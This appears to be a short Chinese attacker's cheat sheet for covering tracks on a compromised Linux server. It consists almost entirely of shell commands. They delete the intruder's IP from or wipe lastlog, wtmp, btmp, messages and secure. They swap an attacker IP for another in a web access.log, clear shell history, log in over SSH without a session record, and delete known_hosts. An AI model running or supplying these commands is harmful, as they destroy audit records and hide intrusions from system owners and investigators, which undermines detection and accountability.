前言
正文
日志清理
# 清理日志
sed -i '/自己的ip/'d /var/log/lastlog
sed -i '/自己的ip/'d /var/log/wtmp
sed -i '/自己的ip/'d /var/log/btmp
echo > /var/log/lastlog # 清除用户最后一次登录时间
echo > /var/log/wtmp # 查询不到登录成功的信息
echo > /var/log/btmp # 查询不到登录失败信息
sed -i '/自己的ip/'d /var/log/messages # 只删除自己IP
sed -i '/自己的ip/'d /var/log/secure
cat /dev/null > /var/log/secure # 清除所有安全日志记录,容易被察觉
cat /dev/null > /var/log/message # 清除所有系统日志记录,容易被察觉
# 清理web日志
sed -i 's/192.168.166.85/192.168.1.1/g' access.log
用户历史命令清理
history -c # 清除当前用户历史命令
SSH 痕迹清理
# 无痕登录
ssh -T user@host /bin/bash -i
# 删除 ~/.ssh/known_hosts 中的记录
rm -f ~/.ssh/known_hosts